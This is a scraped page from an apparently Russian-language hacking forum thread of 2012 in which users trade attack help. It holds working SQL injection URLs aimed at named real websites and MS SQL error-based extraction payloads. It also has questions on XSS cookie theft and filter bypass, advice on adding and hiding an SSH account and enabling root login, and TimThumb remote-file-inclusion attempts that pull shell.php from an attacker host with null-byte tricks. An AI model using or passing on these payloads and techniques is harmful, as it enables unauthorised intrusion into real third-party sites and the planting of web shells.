Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    507
    Likes Received:
    105
    Reputations:
    53
    http://www.mindsoul.ru/index.php?id=-628)union select(concat_ws(0x3a,'',user()))+--+
     
  2. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    http://www.ukcs.net/statsd/stats.php?q=players&page=6&sort=kpm&dir=asc
    help
     
  3. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    507
    Likes Received:
    105
    Reputations:
    53
    Code:
    http://www.ukcs.net/statsd/stats.php?q=players&page=6&sort=rand(if(ascii(substr(version(),1,1))=53,1,0))&dir=asc
    5+
     
    1 person likes this.
  4. lucky_dom

    lucky_dom New Member

    Joined:
    2 Jun 2012
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    вопрос по microsoft acces:
    нашел полЯ с выводом
    теперь если можно примером:
    1.как узнать юзера,базу и т.д.
    2.как повысить привелегии на
    чтение системных таблиц и для иСПОЛЬЗОВАНИЯ
    стандартного шелла

    спецы помогите!
     
  5. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    Ты в слове "иСПОЛЬЗОВАНИЯ" кнопкой shift неправильно воспользовался.

    1) Для того, что бы проверить, надо что-нибудь вывести, для этого используем подзапрос, и так что же мы можем вывести:

    1 or 1=@@version-- - Версия
    1 or 1=(select db_name())-- - Имя Базы Данных текущего юзера.
    1 or 1=(select system_user)-- - Имя юзера владельца данной базой.

    https://forum.antichat.ru/thread30501.html
    2)Не понятно
     
    _________________________
    #20545 kingbeef, 7 Jun 2012
    Last edited: 7 Jun 2012
  6. lucky_dom

    lucky_dom New Member

    Joined:
    2 Jun 2012
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    По пункту 2 читал оф. Документацию
    office.microsoft.com/ru-ru/access-help/CH010072899.aspx
    не понятно как все это дело вставлять в инъекцию
     
  7. br00train

    br00train New Member

    Joined:
    5 Jun 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    ASP.NET Padding Oracle Vulnerability

    Здравствуйте, хотелось бы узнать, каким же образом можно использовать данную уязвимость? В общем по переходе на ссылку:
    выводится сообщение:
    Все ссылки на самом сайте имеют расширение wbp:
    Мои познания очень неглубоки, так что буду очень благодарен если кто нибудь сможет мне разжевать данную информацию.
    Заранее всем большое спасибо...
     
  8. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
  9. Try

    Try Banned

    Joined:
    11 Dec 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    -1
    Народ, где взять дорки для Гугла? :)
     
  10. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
  11. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    Возможно ли с помощью XSS получить куки с другого под домена?
    (need.site.com)
    В данной ситуации :

     
  12. 4otkii

    4otkii New Member

    Joined:
    19 Sep 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте, возможно ли обойти фильтр XSS если никакие символы не фильтруются, кроме как если за "<" есть какой то другой символ , тогда фильтр вырезает эту скобку, а если пробел то оставляет. XSS в тэге , не в атрибуте. Спасибо.
     
  13. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    183
    Likes Received:
    20
    Reputations:
    2
    Как создать учетную запись в ssh срочно !
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    sudo useradd noob
    sudo passwd noob
    ***** (тут пасс)
     
    _________________________
    #20554 Konqi, 12 Jun 2012
    Last edited: 12 Jun 2012
  15. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    183
    Likes Received:
    20
    Reputations:
    2
    куда это прописывать ?
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    что значит куда? у тя же терминал открытый через ssh, вводи эти команды под рутом

    если ты имеешь ввиду создание пользователя у которого будет доступ к ssh, то по дефолту у всех пользователей кроме рута есть доступ к ssh, чтобы работать под рутом поправь файл

    /etc/ssh/sshd_config

    PermitRootLogin no -> PermitRootLogin yes
     
    _________________________
    #20556 Konqi, 12 Jun 2012
    Last edited: 12 Jun 2012
  17. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    183
    Likes Received:
    20
    Reputations:
    2
    А как спрятать учетку ?
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    спрятать от кого или от чего?

    в /etc/passwd все равно палится учетка

    Code:
    cat /etc/passwd  | awk -F: '{print $1}'
     
    _________________________
    1 person likes this.
  19. promarketing

    promarketing New Member

    Joined:
    5 Aug 2011
    Messages:
    14
    Likes Received:
    3
    Reputations:
    0
    Word press TimThumb Уязвимость

    /wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.php (или shell.php4 shell.php%00) даёт error 503 Service temporary unavailable

    Всё остальное успешно инклудится и появляется в cache папке - shell.php%20 shell.gif но не работает как php файл

    Есть решение? вроде возможно т.к пару чужих .php файлов в папке cache уже есть
     
    #20559 promarketing, 13 Jun 2012
    Last edited: 13 Jun 2012
  20. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    а ты пробовал blabla.php%00.jpg , или через temper data?
    или так же заместо http://yousite.com/shell.php
    так https://yousite.com/shell.php,ftp://yousite.com/shell.php?
     
    #20560 Faaax, 13 Jun 2012
    Last edited: 13 Jun 2012
Loading...
Thread Status:
Not open for further replies.